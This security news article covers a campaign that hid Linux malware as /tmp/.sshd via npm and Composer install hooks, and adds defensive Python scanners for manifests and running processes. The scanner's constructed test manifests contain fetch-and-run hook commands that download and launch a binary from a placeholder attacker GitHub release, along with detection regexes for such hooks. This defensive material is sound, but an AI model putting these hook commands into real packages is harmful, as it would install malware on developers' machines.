Hackers Conceal Linux Malware Using SSH-Like Filenames in Software Packages
A sophisticated supply chain attack has emerged, targeting developers by embedding malicious scripts within software packages hosted on GitHub. This campaign has infiltrated over 700 repositories across various ecosystems, posing a significant threat to software integrity and security.
Mechanism of the Attack
The attackers insert malicious post-installation scripts into PHP (Composer) and Node.js (npm) packages, abusing the lifecycle hooks both package managers run automatically on install (npm's `postinstall`, Composer's `post-install-cmd` and related events). When a developer installs the package, the hook contacts an attacker-controlled GitHub account, downloads a Linux binary and writes it to `/tmp/.sshd`. The name mimics `sshd`, the OpenSSH server daemon that is expected to be running on most Linux hosts, so the process looks legitimate in a process listing, while the leading dot keeps the file out of a plain `ls /tmp`.
Discovery and Analysis
Researchers at Socket.dev identified this campaign while investigating flagged Packagist packages. Their AI-powered scanner flagged suspicious install-time behaviour, specifically binary downloads and background execution triggered by the install hook. Further analysis revealed a coordinated operation spanning both Packagist packages and Node.js repositories on GitHub. A GitHub account named `parikhrpreksha` was central to payload delivery: numerous repositories carried near-identical post-install commands, all pulling the same binary from a single GitHub Releases URL.
Stealth Tactics
The attack’s stealth is achieved through several tactics:
– Error Suppression: the script discards error output from the download and launch steps, so a failed fetch (for example on a host without outbound access) leaves nothing in the install log to raise suspicion.
– Background Execution: the binary is launched as a detached background process, so the install command completes normally and the payload outlives it.
– Deceptive Naming: `.sshd` mimics `sshd`, the OpenSSH daemon, so it draws little attention in `ps` or `top`, and the leading dot hides the file from a plain `ls /tmp`, since Unix tools treat dot-prefixed names as hidden by default. The tell is the location: the real daemon lives in a system path such as `/usr/sbin/sshd`, never in `/tmp`.
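The mechanism and stealth tactics above reduce to a handful of indicators that can be checked in a package manifest before anything is installed. The following scanner is an added example, not code from Socket.dev or from the campaign; it parses the `scripts` section of `package.json` and `composer.json`, keeps only hooks that run without user action, and scores each command against the patterns the article describes (downloader, hidden file under `/tmp`, `sshd` lookalike, `chmod +x`, silenced stderr, backgrounding, raw GitHub Releases URL). The sample manifests, the `attacker/repo` URL and the command text are constructed placeholders, not the real campaign's commands.

```python
"""Flag install-time hooks in npm and Composer manifests that fetch and run a
binary. Added example; not the article's or Socket.dev's code. Sample
manifests below are constructed, and the GitHub URL is a placeholder."""
import json
import re

# npm lifecycle hooks that run automatically during `npm install`
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Composer events that run automatically during `composer install` / `update`
COMPOSER_HOOKS = {"pre-install-cmd", "post-install-cmd", "pre-update-cmd",
                  "post-update-cmd", "post-autoload-dump", "post-package-install"}

# One rule per indicator from the article; a hook is reported when several hit.
RULES = [
    ("downloader",      re.compile(r"\b(curl|wget)\b")),
    ("tmp_dotfile",     re.compile(r"/tmp/\.[A-Za-z0-9_]")),       # hidden file in /tmp
    ("sshd_lookalike",  re.compile(r"\.sshd\b")),                   # dot-prefixed sshd
    ("chmod_exec",      re.compile(r"chmod\s+(\+x|[0-7]*7[0-7]*)")),
    ("stderr_silenced", re.compile(r"2>\s*/dev/null")),
    ("backgrounded",    re.compile(r"(\bnohup\b|&\s*$|&\s*;|&\s*\))")),
    ("raw_release_url", re.compile(r"github\.com/[^/\s]+/[^/\s]+/releases/download/")),
]


def install_hooks(manifest, kind):
    """Return {hook: command} for hooks that run without user action.
    kind is 'npm' or 'composer'. Composer allows a list of commands per
    event; npm uses a single string; both are normalised to one string."""
    hooks = NPM_HOOKS if kind == "npm" else COMPOSER_HOOKS
    out = {}
    for name, cmd in (manifest.get("scripts") or {}).items():
        if name in hooks:
            cmds = cmd if isinstance(cmd, list) else [cmd]
            out[name] = " ; ".join(str(c) for c in cmds)
    return out


def score_command(cmd):
    """Names of the rules that match the command text."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan_manifest(text, kind, threshold=3):
    """Parse manifest JSON and return findings for auto-run hooks whose
    command matches at least `threshold` indicator rules."""
    manifest = json.loads(text)
    findings = []
    for hook, cmd in install_hooks(manifest, kind).items():
        hits = score_command(cmd)
        if len(hits) >= threshold:
            findings.append({"hook": hook, "command": cmd, "indicators": hits})
    return findings


# Constructed samples (not the campaign's real manifests or URL).
MALICIOUS_NPM = json.dumps({
    "name": "example-helper", "version": "1.0.0",
    "scripts": {
        "postinstall": ("curl -sL https://github.com/attacker/repo/releases/download/v1/payload "
                        "-o /tmp/.sshd 2>/dev/null; chmod +x /tmp/.sshd; "
                        "nohup /tmp/.sshd >/dev/null 2>&1 &"),
        "test": "node test.js",
    },
})
BENIGN_NPM = json.dumps({
    "name": "example-lib", "version": "2.0.0",
    "scripts": {"postinstall": "node scripts/build-native.js", "test": "jest"},
})
MALICIOUS_COMPOSER = json.dumps({
    "name": "vendor/example-package",
    "scripts": {"post-install-cmd": [
        "wget -q https://github.com/attacker/repo/releases/download/v1/payload -O /tmp/.sshd 2>/dev/null",
        "chmod +x /tmp/.sshd && (/tmp/.sshd &)",
    ]},
})

if __name__ == "__main__":
    for label, text, kind in [("npm/malicious", MALICIOUS_NPM, "npm"),
                              ("npm/benign", BENIGN_NPM, "npm"),
                              ("composer/malicious", MALICIOUS_COMPOSER, "composer")]:
        for f in scan_manifest(text, kind):
            print(f"{label}: hook {f['hook']!r} hit {', '.join(f['indicators'])}")
```

The threshold matters: a legitimate native-module package may well run `curl` or `chmod +x` in `postinstall`, so a single indicator is noise, whereas a hidden path under `/tmp` combined with silenced stderr and a backgrounded launch is the exact shape of this campaign. Run it over every `node_modules/*/package.json` and `vendor/*/*/composer.json` after a dry-run install with scripts disabled, before allowing scripts to execute.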
Implications for Developers
This attack underscores the critical importance of vigilance in software development and package management:
– Code Review: audit the `scripts` section of `package.json` and `composer.json` in dependencies (and lockfile diffs on every update) for install-time hooks that download, write under `/tmp`, or background a process; treat any hook that fetches and executes a binary as a finding until proven otherwise.
– Source Verification: install only from trusted registries with lockfiles pinned to reviewed versions, and be sceptical of packages whose install step pulls artifacts from an arbitrary GitHub Releases URL instead of the registry itself.
– Security Tools: disable lifecycle scripts where the build does not need them (`npm ci --ignore-scripts`, `composer install --no-scripts`), and use install-time behaviour scanners such as the one that surfaced this campaign, complemented by host monitoring for executables launched from `/tmp`.
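The artifact the campaign leaves on a host is specific enough to hunt for: a process named like `sshd` whose executable was launched from `/tmp` (or another world-writable temp directory) rather than from the system path. The following host check is an added example, not code from the article or Socket.dev. It reads `/proc/<pid>/comm` and `/proc/<pid>/exe` on Linux, and the sample process table, the `LEGIT_SSHD_PATHS` set and the temp-directory list are assumptions to adjust for your own images.

```python
"""Hunt for an '.sshd' impostor: a process whose name looks like the OpenSSH
daemon but whose executable runs from a temp directory or outside the
packaged install path. Added example; not the article's or Socket.dev's code.
SAMPLE_PROCESSES is constructed, not captured from a real host."""
import os

# Assumption: where the genuine daemon is installed on common distributions.
LEGIT_SSHD_PATHS = {"/usr/sbin/sshd", "/usr/bin/sshd"}
# Directories from which no daemon should ever be running.
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DELETED_SUFFIX = " (deleted)"   # appended by the kernel in /proc/<pid>/exe


def read_proc_processes():
    """Yield (pid, comm, exe) for live processes on Linux. Processes we cannot
    read (exited, or owned by another user without privilege) are skipped."""
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue
        yield pid, comm, exe


def classify(pid, comm, exe):
    """Return the list of reasons this process is suspicious (empty if none)."""
    reasons = []
    deleted = exe.endswith(DELETED_SUFFIX)
    path = exe[:-len(DELETED_SUFFIX)] if deleted else exe
    base = os.path.basename(path)

    if path.startswith(TEMP_DIRS):
        reasons.append("executable runs from a temp directory")
    if base.startswith("."):
        # The kernel's comm field is the binary's basename, so /tmp/.sshd
        # shows up as '.sshd' in `ps`; many tools hide dot-prefixed names.
        reasons.append("hidden (dot-prefixed) executable name")
    if "sshd" in (comm.lstrip("."), base.lstrip(".")) and path not in LEGIT_SSHD_PATHS:
        reasons.append("sshd lookalike outside the packaged install path")
    if deleted:
        reasons.append("binary removed from disk after launch")
    return reasons


def find_suspicious(processes):
    """Filter an iterable of (pid, comm, exe) down to [(pid, comm, exe, reasons)]."""
    hits = []
    for pid, comm, exe in processes:
        reasons = classify(pid, comm, exe)
        if reasons:
            hits.append((pid, comm, exe, reasons))
    return hits


# Constructed sample process table (not from a real host).
SAMPLE_PROCESSES = [
    (812,  "sshd",  "/usr/sbin/sshd"),                      # genuine daemon
    (4711, ".sshd", "/tmp/.sshd"),                          # the article's artifact
    (4720, "node",  "/usr/bin/node"),                       # install process, benign
    (4733, "sshd",  "/home/dev/.cache/sshd" + DELETED_SUFFIX),  # lookalike that unlinked itself
]

if __name__ == "__main__":
    tables = [("sample", SAMPLE_PROCESSES)]
    if os.path.isdir("/proc"):
        tables.append(("live", read_proc_processes()))
    for label, table in tables:
        for pid, comm, exe, reasons in find_suspicious(table):
            print(f"[{label}] pid {pid} comm={comm!r} exe={exe}: {'; '.join(reasons)}")
```

Note that the genuine daemon's `comm` is `sshd` and its `exe` resolves into the package manager's install path, so it never matches; the impostor trips three separate checks at once. Run the live scan as root, since `/proc/<pid>/exe` of another user's process is unreadable otherwise, and the malware was dropped by whatever account ran the package install.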
Conclusion
The concealment of Linux malware under SSH-like filenames within software packages represents a significant evolution in cyberattack strategies. Developers and organizations must adopt proactive security measures to safeguard against these insidious threats, ensuring the integrity and security of their software supply chains.